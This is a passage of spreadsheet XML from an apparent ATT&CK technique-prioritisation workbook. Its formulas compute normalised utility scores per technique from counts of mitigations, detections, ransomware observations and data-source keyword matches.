        <f>IF(Table1[[#This Row],[Count Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Count Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Count Utility (unclipped)]]) )</f>
        <v>0.23809523809523808</v>
      </c>
      <c r="AU2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9" spans="1:47" ht="48">
      <c r="A29" s="25">
        <f>parameters!$J$21*Table1[[#This Row],[TAT Utility]]+parameters!$J$22*Table1[[#This Row],[Count Utility]]</f>
        <v>0.21955720030666664</v>
      </c>
      <c r="B29" s="25">
        <f>SUM(H29,M29,V29)*(1+SUM(AE29,AG29,AI29,AK29,AM29))</f>
        <v>1.1955720030666666</v>
      </c>
      <c r="C29" s="25" t="s">
        <v>201</v>
      </c>
      <c r="D29" s="25" t="s">
        <v>202</v>
      </c>
      <c r="E29" s="25" t="s">
        <v>89</v>
      </c>
      <c r="F29" s="51">
        <v>7</v>
      </c>
      <c r="G29" s="51">
        <v>2</v>
      </c>
      <c r="H29" s="25">
        <f>parameters!$J$10*Table1[[#This Row],[Before Utility]]+parameters!$J$11*Table1[[#This Row],[After Utility]]</f>
        <v>0.44999999999999996</v>
      </c>
      <c r="I29">
        <f>(Table1[[#This Row],[Num. TID Before]]-parameters!$D$8)/(parameters!$D$9-parameters!$D$8)</f>
        <v>0.7</v>
      </c>
      <c r="J29">
        <f>IF(Table1[[#This Row],[Before Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Before Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Before Utility (unclipped)]]))</f>
        <v>0.7</v>
      </c>
      <c r="K29">
        <f>(Table1[[#This Row],[Num. TID After]]-parameters!$D$10)/(parameters!$D$11-parameters!$D$10)</f>
        <v>0.2</v>
      </c>
      <c r="L29">
        <f>IF(Table1[[#This Row],[After Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[After Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[After Utility (unclipped)]]))</f>
        <v>0.2</v>
      </c>
      <c r="M29" s="44">
        <v>0.31083107999999998</v>
      </c>
      <c r="N29" s="51">
        <v>0</v>
      </c>
      <c r="O29" s="51">
        <v>2</v>
      </c>
      <c r="P29" s="51">
        <v>22</v>
      </c>
      <c r="Q29" s="51">
        <v>3</v>
      </c>
      <c r="R29" s="51"/>
      <c r="S29" s="51">
        <v>0</v>
      </c>
      <c r="T29" s="51"/>
      <c r="U29" s="51">
        <v>1</v>
      </c>
      <c r="V29" s="25">
        <f>parameters!$J$4*Table1[[#This Row],[Mitigations Utility]] + parameters!$J$5*Table1[[#This Row],[Detections Utility]]</f>
        <v>0.1380952380952381</v>
      </c>
      <c r="W29">
        <f>SUM(Table1[[#This Row],[Num. 800-53 (r5)]],Table1[[#This Row],[Num. CIS Controls]])</f>
        <v>1</v>
      </c>
      <c r="X29">
        <f>(Table1[[#This Row],[Total Mitigations]]-parameters!$D$2)/(parameters!$D$3-parameters!$D$2)</f>
        <v>1.8181818181818181E-2</v>
      </c>
      <c r="Y29">
        <f>IF(Table1[[#This Row],[Mitigations Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Mitigations Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Mitigations Utility (unclipped)]]) )</f>
        <v>1.8181818181818181E-2</v>
      </c>
      <c r="Z29">
        <f>SUM(Table1[[#This Row],[Num. CAR]:[Num. Splunk]])</f>
        <v>27</v>
      </c>
      <c r="AA29">
        <f>(Table1[[#This Row],[Total Detections]]-parameters!$D$4)/(parameters!$D$5-parameters!$D$4)</f>
        <v>0.27</v>
      </c>
      <c r="AB29">
        <f>IF(Table1[[#This Row],[Detections Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Detections Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Detections Utility (unclipped)]]) )</f>
        <v>0.27</v>
      </c>
      <c r="AC29" s="29" t="s">
        <v>203</v>
      </c>
      <c r="AD29" s="25" t="str" cm="1">
        <f t="array" ref="AD29">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Process","Command","Script","WMI","Module","Pipe","Service"},AC29)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AE29" s="25">
        <f>IF(AD29="1",'TOP 10 TECHNIQUES'!C$15,0)</f>
        <v>0.19800000000000001</v>
      </c>
      <c r="AF29" s="25" t="str" cm="1">
        <f t="array" ref="AF29">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Network","Firewall"},AC29)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AG29" s="25">
        <f>IF(AF29="1",'TOP 10 TECHNIQUES'!C$16,0)</f>
        <v>0</v>
      </c>
      <c r="AH29" s="25" t="str" cm="1">
        <f t="array" ref="AH29">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"File","Group","Logon","Schedule","User","Registry","Active","Application"},AC29)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AI29" s="25">
        <f>IF(AH29="1",'TOP 10 TECHNIQUES'!C$17,0)</f>
        <v>0.13200000000000001</v>
      </c>
      <c r="AJ29" s="25" t="str" cm="1">
        <f t="array" ref="AJ29">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Cloud","Cluster","Container","Image","Instance","Pod","Snapshot","Volume"},AC29)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AK29" s="25">
        <f>IF(AJ29="1",'TOP 10 TECHNIQUES'!C$18,0)</f>
        <v>0</v>
      </c>
      <c r="AL29" s="25" t="str" cm="1">
        <f t="array" ref="AL29">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Drive","Firmware","Host","Kernel"},AC29)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AM29" s="25">
        <f>IF(AL29="1",'TOP 10 TECHNIQUES'!C$19,0)</f>
        <v>0</v>
      </c>
      <c r="AN29" s="52">
        <v>3</v>
      </c>
      <c r="AO29" s="51">
        <v>1</v>
      </c>
      <c r="AP29" s="25">
        <f>parameters!$J$21*Table1[[#This Row],[TAT Utility]]+parameters!$J$22*Table1[[#This Row],[Count Utility]]</f>
        <v>0.21955720030666664</v>
      </c>
      <c r="AQ29" s="25">
        <f>(Table1[[#This Row],[Total Top Att&amp;ck Score ]]-parameters!$D$19)/(parameters!$D$20-parameters!$D$19)</f>
        <v>0.39852400102222219</v>
      </c>
      <c r="AR29" s="25">
        <f>IF(Table1[[#This Row],[TAT Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[TAT Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[TAT Utility (unclipped)]]) )</f>
        <v>0.39852400102222219</v>
      </c>
      <c r="AS29" s="25">
        <f>(Table1[[#This Row],[Ransomware (Total '# of ATT&amp;CK Observations)]]-parameters!$D$21)/(parameters!$D$22-parameters!$D$21)</f>
        <v>0.14285714285714285</v>
      </c>
      <c r="AT29" s="25">
        <f>IF(Table1[[#This Row],[Count Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Count Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Count Utility (unclipped)]]) )</f>
        <v>0.14285714285714285</v>
      </c>
      <c r="AU2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0" spans="1:47" ht="32.1">
      <c r="A30" s="25">
        <f>parameters!$J$21*Table1[[#This Row],[TAT Utility]]+parameters!$J$22*Table1[[#This Row],[Count Utility]]</f>
        <v>0.14005465452914284</v>
      </c>
      <c r="B30" s="25">
        <f>SUM(H30,M30,V30)*(1+SUM(AE30,AG30,AI30,AK30,AM30))</f>
        <v>0.73387987862476178</v>
      </c>
      <c r="C30" s="25" t="s">
        <v>204</v>
      </c>
      <c r="D30" s="25" t="s">
        <v>205</v>
      </c>
      <c r="E30" s="25" t="s">
        <v>89</v>
      </c>
      <c r="F30" s="51">
        <v>4</v>
      </c>
      <c r="G30" s="51">
        <v>3</v>
      </c>
      <c r="H30" s="25">
        <f>parameters!$J$10*Table1[[#This Row],[Before Utility]]+parameters!$J$11*Table1[[#This Row],[After Utility]]</f>
        <v>0.35</v>
      </c>
      <c r="I30">
        <f>(Table1[[#This Row],[Num. TID Before]]-parameters!$D$8)/(parameters!$D$9-parameters!$D$8)</f>
        <v>0.4</v>
      </c>
      <c r="J30">
        <f>IF(Table1[[#This Row],[Before Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Before Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Before Utility (unclipped)]]))</f>
        <v>0.4</v>
      </c>
      <c r="K30">
        <f>(Table1[[#This Row],[Num. TID After]]-parameters!$D$10)/(parameters!$D$11-parameters!$D$10)</f>
        <v>0.3</v>
      </c>
      <c r="L30">
        <f>IF(Table1[[#This Row],[After Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[After Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[After Utility (unclipped)]]))</f>
        <v>0.3</v>
      </c>
      <c r="M30" s="44">
        <v>0.25782564000000002</v>
      </c>
      <c r="N30" s="51">
        <v>0</v>
      </c>
      <c r="O30" s="51">
        <v>0</v>
      </c>
      <c r="P30" s="51">
        <v>1</v>
      </c>
      <c r="Q30" s="51">
        <v>0</v>
      </c>
      <c r="R30" s="51"/>
      <c r="S30" s="51">
        <v>0</v>
      </c>
      <c r="T30" s="51"/>
      <c r="U30" s="51">
        <v>0</v>
      </c>
      <c r="V30" s="25">
        <f>parameters!$J$4*Table1[[#This Row],[Mitigations Utility]] + parameters!$J$5*Table1[[#This Row],[Detections Utility]]</f>
        <v>4.7619047619047615E-3</v>
      </c>
      <c r="W30">
        <f>SUM(Table1[[#This Row],[Num. 800-53 (r5)]],Table1[[#This Row],[Num. CIS Controls]])</f>
        <v>0</v>
      </c>
      <c r="X30">
        <f>(Table1[[#This Row],[Total Mitigations]]-parameters!$D$2)/(parameters!$D$3-parameters!$D$2)</f>
        <v>0</v>
      </c>
      <c r="Y30">
        <f>IF(Table1[[#This Row],[Mitigations Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Mitigations Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Mitigations Utility (unclipped)]]) )</f>
        <v>0</v>
      </c>
      <c r="Z30">
        <f>SUM(Table1[[#This Row],[Num. CAR]:[Num. Splunk]])</f>
        <v>1</v>
      </c>
      <c r="AA30">
        <f>(Table1[[#This Row],[Total Detections]]-parameters!$D$4)/(parameters!$D$5-parameters!$D$4)</f>
        <v>0.01</v>
      </c>
      <c r="AB30">
        <f>IF(Table1[[#This Row],[Detections Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Detections Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Detections Utility (unclipped)]]) )</f>
        <v>0.01</v>
      </c>
      <c r="AC30" s="29" t="s">
        <v>206</v>
      </c>
      <c r="AD30" s="25" t="str" cm="1">
        <f t="array" ref="AD30">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Process","Command","Script","WMI","Module","Pipe","Service"},AC30)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AE30" s="25">
        <f>IF(AD30="1",'TOP 10 TECHNIQUES'!C$15,0)</f>
        <v>0.19800000000000001</v>
      </c>
      <c r="AF30" s="25" t="str" cm="1">
        <f t="array" ref="AF30">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Network","Firewall"},AC30)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AG30" s="25">
        <f>IF(AF30="1",'TOP 10 TECHNIQUES'!C$16,0)</f>
        <v>0</v>
      </c>
      <c r="AH30" s="25" t="str" cm="1">
        <f t="array" ref="AH30">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"File","Group","Logon","Schedule","User","Registry","Active","Application"},AC30)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AI30" s="25">
        <f>IF(AH30="1",'TOP 10 TECHNIQUES'!C$17,0)</f>
        <v>0</v>
      </c>
      <c r="AJ30" s="25" t="str" cm="1">
        <f t="array" ref="AJ30">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Cloud","Cluster","Container","Image","Instance","Pod","Snapshot","Volume"},AC30)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AK30" s="25">
        <f>IF(AJ30="1",'TOP 10 TECHNIQUES'!C$18,0)</f>
        <v>0</v>
      </c>
      <c r="AL30" s="25" t="str" cm="1">
        <f t="array" ref="AL30">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Drive","Firmware","Host","Kernel"},AC30)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AM30" s="25">
        <f>IF(AL30="1",'TOP 10 TECHNIQUES'!C$19,0)</f>
        <v>0</v>
      </c>
      <c r="AN30" s="59">
        <v>2</v>
      </c>
      <c r="AO30" s="51">
        <v>1</v>
      </c>
      <c r="AP30" s="25">
        <f>parameters!$J$21*Table1[[#This Row],[TAT Utility]]+parameters!$J$22*Table1[[#This Row],[Count Utility]]</f>
        <v>0.14005465452914284</v>
      </c>
      <c r="AQ30" s="25">
        <f>(Table1[[#This Row],[Total Top Att&amp;ck Score ]]-parameters!$D$19)/(parameters!$D$20-parameters!$D$19)</f>
        <v>0.24462662620825393</v>
      </c>
      <c r="AR30" s="25">
        <f>IF(Table1[[#This Row],[TAT Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[TAT Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[TAT Utility (unclipped)]]) )</f>
        <v>0.24462662620825393</v>
      </c>
      <c r="AS30" s="25">
        <f>(Table1[[#This Row],[Ransomware (Total '# of ATT&amp;CK Observations)]]-parameters!$D$21)/(parameters!$D$22-parameters!$D$21)</f>
        <v>9.5238095238095233E-2</v>
      </c>
      <c r="AT30" s="25">
        <f>IF(Table1[[#This Row],[Count Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Count Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Count Utility (unclipped)]]) )</f>
        <v>9.5238095238095233E-2</v>
      </c>
      <c r="AU3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1" spans="1:47" ht="32.1">
      <c r="A31" s="25">
        <f>parameters!$J$21*Table1[[#This Row],[TAT Utility]]+parameters!$J$22*Table1[[#This Row],[Count Utility]]</f>
        <v>7.5205548756666671E-2</v>
      </c>
      <c r="B31" s="25">
        <f>SUM(H31,M31,V31)*(1+SUM(AE31,AG31,AI31,AK31,AM31))</f>
        <v>0.75205548756666663</v>
      </c>
      <c r="C31" s="25" t="s">
        <v>207</v>
      </c>
      <c r="D31" s="25" t="s">
        <v>208</v>
      </c>
      <c r="E31" s="25" t="s">
        <v>89</v>
      </c>
      <c r="F31" s="51">
        <v>3</v>
      </c>
      <c r="G31" s="51">
        <v>1</v>
      </c>
      <c r="H31" s="25">
        <f>parameters!$J$10*Table1[[#This Row],[Before Utility]]+parameters!$J$11*Table1[[#This Row],[After Utility]]</f>
        <v>0.2</v>
      </c>
      <c r="I31">
        <f>(Table1[[#This Row],[Num. TID Before]]-parameters!$D$8)/(parameters!$D$9-parameters!$D$8)</f>
        <v>0.3</v>
      </c>
      <c r="J31">
        <f>IF(Table1[[#This Row],[Before Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Before Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Before Utility (unclipped)]]))</f>
        <v>0.3</v>
      </c>
      <c r="K31">
        <f>(Table1[[#This Row],[Num. TID After]]-parameters!$D$10)/(parameters!$D$11-parameters!$D$10)</f>
        <v>0.1</v>
      </c>
      <c r="L31">
        <f>IF(Table1[[#This Row],[After Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[After Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[After Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="M31" s="44">
        <v>0.24164573</v>
      </c>
      <c r="N31" s="51">
        <v>0</v>
      </c>
      <c r="O31" s="51">
        <v>6</v>
      </c>
      <c r="P31" s="51">
        <v>12</v>
      </c>
      <c r="Q31" s="51">
        <v>0</v>
      </c>
      <c r="R31" s="51"/>
      <c r="S31" s="51">
        <v>0</v>
      </c>
      <c r="T31" s="52" t="s">
        <v>209</v>
      </c>
      <c r="U31" s="51">
        <v>4</v>
      </c>
      <c r="V31" s="25">
        <f>parameters!$J$4*Table1[[#This Row],[Mitigations Utility]] + parameters!$J$5*Table1[[#This Row],[Detections Utility]]</f>
        <v>0.1238095238095238</v>
      </c>
      <c r="W31">
        <f>SUM(Table1[[#This Row],[Num. 800-53 (r5)]],Table1[[#This Row],[Num. CIS Controls]])</f>
        <v>4</v>
      </c>
      <c r="X31">
        <f>(Table1[[#This Row],[Total Mitigations]]-parameters!$D$2)/(parameters!$D$3-parameters!$D$2)</f>
        <v>7.2727272727272724E-2</v>
      </c>
      <c r="Y31">
        <f>IF(Table1[[#This Row],[Mitigations Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Mitigations Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Mitigations Utility (unclipped)]]) )</f>
        <v>7.2727272727272724E-2</v>
      </c>
      <c r="Z31">
        <f>SUM(Table1[[#This Row],[Num. CAR]:[Num. Splunk]])</f>
        <v>18</v>
      </c>
      <c r="AA31">
        <f>(Table1[[#This Row],[Total Detections]]-parameters!$D$4)/(parameters!$D$5-parameters!$D$4)</f>
        <v>0.18</v>
      </c>
      <c r="AB31">
        <f>IF(Table1[[#This Row],[Detections Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Detections Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Detections Utility (unclipped)]]) )</f>
        <v>0.18</v>
      </c>
      <c r="AC31" s="29" t="s">
        <v>210</v>
      </c>
      <c r="AD31" s="25" t="str" cm="1">
        <f t="array" ref="AD31">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Process","Command","Script","WMI","Module","Pipe","Service"},AC31)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AE31" s="25">
        <f>IF(AD31="1",'TOP 10 TECHNIQUES'!C$15,0)</f>
        <v>0.19800000000000001</v>
      </c>
      <c r="AF31" s="25" t="str" cm="1">
        <f t="array" ref="AF31">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Network","Firewall"},AC31)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AG31" s="25">
        <f>IF(AF31="1",'TOP 10 TECHNIQUES'!C$16,0)</f>
        <v>0</v>
      </c>
      <c r="AH31" s="25" t="str" cm="1">
        <f t="array" ref="AH31">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"File","Group","Logon","Schedule","User","Registry","Active","Application"},AC31)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AI31" s="25">
        <f>IF(AH31="1",'TOP 10 TECHNIQUES'!C$17,0)</f>
        <v>0.13200000000000001</v>
      </c>
      <c r="AJ31" s="25" t="str" cm="1">
        <f t="array" ref="AJ31">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Cloud","Cluster","Container","Image","Instance","Pod","Snapshot","Volume"},AC31)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AK31" s="25">
        <f>IF(AJ31="1",'TOP 10 TECHNIQUES'!C$18,0)</f>
        <v>0</v>
      </c>
      <c r="AL31" s="25" t="str" cm="1">
        <f t="array" ref="AL31">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Drive","Firmware","Host","Kernel"},AC31)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AM31" s="25">
        <f>IF(AL31="1",'TOP 10 TECHNIQUES'!C$19,0)</f>
        <v>0</v>
      </c>
      <c r="AN31" s="52">
        <v>0</v>
      </c>
      <c r="AO31" s="51">
        <v>0</v>
      </c>
      <c r="AP31" s="25">
        <f>parameters!$J$21*Table1[[#This Row],[TAT Utility]]+parameters!$J$22*Table1[[#This Row],[Count Utility]]</f>
        <v>7.5205548756666671E-2</v>
      </c>
      <c r="AQ31" s="25">
        <f>(Table1[[#This Row],[Total Top Att&amp;ck Score ]]-parameters!$D$19)/(parameters!$D$20-parameters!$D$19)</f>
        <v>0.25068516252222223</v>
      </c>
      <c r="AR31" s="25">
        <f>IF(Table1[[#This Row],[TAT Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[TAT Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[TAT Utility (unclipped)]]) )</f>
        <v>0.25068516252222223</v>
      </c>
      <c r="AS31" s="25">
        <f>(Table1[[#This Row],[Ransomware (Total '# of ATT&amp;CK Observations)]]-parameters!$D$21)/(parameters!$D$22-parameters!$D$21)</f>
        <v>0</v>
      </c>
      <c r="AT31" s="25">
        <f>IF(Table1[[#This Row],[Count Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Count Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Count Utility (unclipped)]]) )</f>
        <v>0</v>
      </c>
      <c r="AU3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2" spans="1:47">
      <c r="A32" s="25">
        <f>parameters!$J$21*Table1[[#This Row],[TAT Utility]]+parameters!$J$22*Table1[[#This Row],[Count Utility]]</f>
        <v>0.24177222424076189</v>
      </c>
      <c r="B32" s="25">
        <f>SUM(H32,M32,V32)*(1+SUM(AE32,AG32,AI32,AK32,AM32))</f>
        <v>1.0843889090742858</v>
      </c>
      <c r="C32" s="25" t="s">
        <v>211</v>
      </c>
      <c r="D32" s="25" t="s">
        <v>212</v>
      </c>
      <c r="E32" s="25" t="s">
        <v>89</v>
      </c>
      <c r="F32" s="51">
        <v>1</v>
      </c>
      <c r="G32" s="51">
        <v>15</v>
      </c>
      <c r="H32" s="25">
        <f>parameters!$J$10*Table1[[#This Row],[Before Utility]]+parameters!$J$11*Table1[[#This Row],[After Utility]]</f>
        <v>0.55000000000000004</v>
      </c>
      <c r="I32">
        <f>(Table1[[#This Row],[Num. TID Before]]-parameters!$D$8)/(parameters!$D$9-parameters!$D$8)</f>
        <v>0.1</v>
      </c>
      <c r="J32">
        <f>IF(Table1[[#This Row],[Before Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Before Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Before Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="K32">
        <f>(Table1[[#This Row],[Num. TID After]]-parameters!$D$10)/(parameters!$D$11-parameters!$D$10)</f>
        <v>1.5</v>
      </c>
      <c r="L32">
        <f>IF(Table1[[#This Row],[After Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[After Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[After Utility (unclipped)]]))</f>
        <v>1</v>
      </c>
      <c r="M32" s="44">
        <v>0.24088032000000001</v>
      </c>
      <c r="N32" s="51">
        <v>0</v>
      </c>
      <c r="O32" s="51">
        <v>5</v>
      </c>
      <c r="P32" s="51">
        <v>1</v>
      </c>
      <c r="Q32" s="51">
        <v>2</v>
      </c>
      <c r="R32" s="51"/>
      <c r="S32" s="51">
        <v>1</v>
      </c>
      <c r="T32" s="51" t="s">
        <v>213</v>
      </c>
      <c r="U32" s="51">
        <v>7</v>
      </c>
      <c r="V32" s="25">
        <f>parameters!$J$4*Table1[[#This Row],[Mitigations Utility]] + parameters!$J$5*Table1[[#This Row],[Detections Utility]]</f>
        <v>0.1142857142857143</v>
      </c>
      <c r="W32">
        <f>SUM(Table1[[#This Row],[Num. 800-53 (r5)]],Table1[[#This Row],[Num. CIS Controls]])</f>
        <v>8</v>
      </c>
      <c r="X32">
        <f>(Table1[[#This Row],[Total Mitigations]]-parameters!$D$2)/(parameters!$D$3-parameters!$D$2)</f>
        <v>0.14545454545454545</v>
      </c>
      <c r="Y32">
        <f>IF(Table1[[#This Row],[Mitigations Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Mitigations Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Mitigations Utility (unclipped)]]) )</f>
        <v>0.14545454545454545</v>
      </c>
      <c r="Z32">
        <f>SUM(Table1[[#This Row],[Num. CAR]:[Num. Splunk]])</f>
        <v>8</v>
      </c>
      <c r="AA32">
        <f>(Table1[[#This Row],[Total Detections]]-parameters!$D$4)/(parameters!$D$5-parameters!$D$4)</f>
        <v>0.08</v>
      </c>
      <c r="AB32">
        <f>IF(Table1[[#This Row],[Detections Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Detections Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Detections Utility (unclipped)]]) )</f>
        <v>0.08</v>
      </c>
      <c r="AC32" s="29" t="s">
        <v>136</v>
      </c>
      <c r="AD32" s="25" t="str" cm="1">
        <f t="array" ref="AD32">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Process","Command","Script","WMI","Module","Pipe","Service"},AC32)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AE32" s="25">
        <f>IF(AD32="1",'TOP 10 TECHNIQUES'!C$15,0)</f>
        <v>0.19800000000000001</v>
      </c>
      <c r="AF32" s="25" t="str" cm="1">
        <f t="array" ref="AF32">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Network","Firewall"},AC32)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AG32" s="25">
        <f>IF(AF32="1",'TOP 10 TECHNIQUES'!C$16,0)</f>
        <v>0</v>
      </c>
      <c r="AH32" s="25" t="str" cm="1">
        <f t="array" ref="AH32">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"File","Group","Logon","Schedule","User","Registry","Active","Application"},AC32)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AI32" s="25">
        <f>IF(AH32="1",'TOP 10 TECHNIQUES'!C$17,0)</f>
        <v>0</v>
      </c>
      <c r="AJ32" s="25" t="str" cm="1">
        <f t="array" ref="AJ32">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Cloud","Cluster","Container","Image","Instance","Pod","Snapshot","Volume"},AC32)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AK32" s="25">
        <f>IF(AJ32="1",'TOP 10 TECHNIQUES'!C$18,0)</f>
        <v>0</v>
      </c>
      <c r="AL32" s="25" t="str" cm="1">
        <f t="array" ref="AL32">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Drive","Firmware","Host","Kernel"},AC32)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AM32" s="25">
        <f>IF(AL32="1",'TOP 10 TECHNIQUES'!C$19,0)</f>
        <v>0</v>
      </c>
      <c r="AN32" s="52">
        <v>4</v>
      </c>
      <c r="AO32" s="51">
        <v>1</v>
      </c>
      <c r="AP32" s="25">
        <f>parameters!$J$21*Table1[[#This Row],[TAT Utility]]+parameters!$J$22*Table1[[#This Row],[Count Utility]]</f>
        <v>0.24177222424076189</v>
      </c>
      <c r="AQ32" s="25">
        <f>(Table1[[#This Row],[Total Top Att&amp;ck Score ]]-parameters!$D$19)/(parameters!$D$20-parameters!$D$19)</f>
        <v>0.3614629696914286</v>
      </c>
      <c r="AR32" s="25">
        <f>IF(Table1[[#This Row],[TAT Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[TAT Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[TAT Utility (unclipped)]]) )</f>
        <v>0.3614629696914286</v>
      </c>
      <c r="AS32" s="25">
        <f>(Table1[[#This Row],[Ransomware (Total '# of ATT&amp;CK Observations)]]-parameters!$D$21)/(parameters!$D$22-parameters!$D$21)</f>
        <v>0.19047619047619047</v>
      </c>
      <c r="AT32" s="25">
        <f>IF(Table1[[#This Row],[Count Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Count Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Count Utility (unclipped)]]) )</f>
        <v>0.19047619047619047</v>
      </c>
      <c r="AU3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3" spans="1:47" ht="48">
      <c r="A33" s="25">
        <f>parameters!$J$21*Table1[[#This Row],[TAT Utility]]+parameters!$J$22*Table1[[#This Row],[Count Utility]]</f>
        <v>7.1946646653333335E-2</v>
      </c>
      <c r="B33" s="25">
        <f>SUM(H33,M33,V33)*(1+SUM(AE33,AG33,AI33,AK33,AM33))</f>
        <v>0.71946646653333335</v>
      </c>
      <c r="C33" s="25" t="s">
        <v>214</v>
      </c>
      <c r="D33" s="25" t="s">
        <v>215</v>
      </c>
      <c r="E33" s="25" t="s">
        <v>89</v>
      </c>
      <c r="F33" s="51">
        <v>4</v>
      </c>
      <c r="G33" s="51">
        <v>1</v>
      </c>
      <c r="H33" s="25">
        <f>parameters!$J$10*Table1[[#This Row],[Before Utility]]+parameters!$J$11*Table1[[#This Row],[After Utility]]</f>
        <v>0.25</v>
      </c>
      <c r="I33">
        <f>(Table1[[#This Row],[Num. TID Before]]-parameters!$D$8)/(parameters!$D$9-parameters!$D$8)</f>
        <v>0.4</v>
      </c>
      <c r="J33">
        <f>IF(Table1[[#This Row],[Before Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Before Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Before Utility (unclipped)]]))</f>
        <v>0.4</v>
      </c>
      <c r="K33">
        <f>(Table1[[#This Row],[Num. TID After]]-parameters!$D$10)/(parameters!$D$11-parameters!$D$10)</f>
        <v>0.1</v>
      </c>
      <c r="L33">
        <f>IF(Table1[[#This Row],[After Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[After Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[After Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="M33" s="44">
        <v>0.20047603999999999</v>
      </c>
      <c r="N33" s="51">
        <v>0</v>
      </c>
      <c r="O33" s="51">
        <v>1</v>
      </c>
      <c r="P33" s="51">
        <v>7</v>
      </c>
      <c r="Q33" s="51">
        <v>3</v>
      </c>
      <c r="R33" s="51">
        <v>5.2</v>
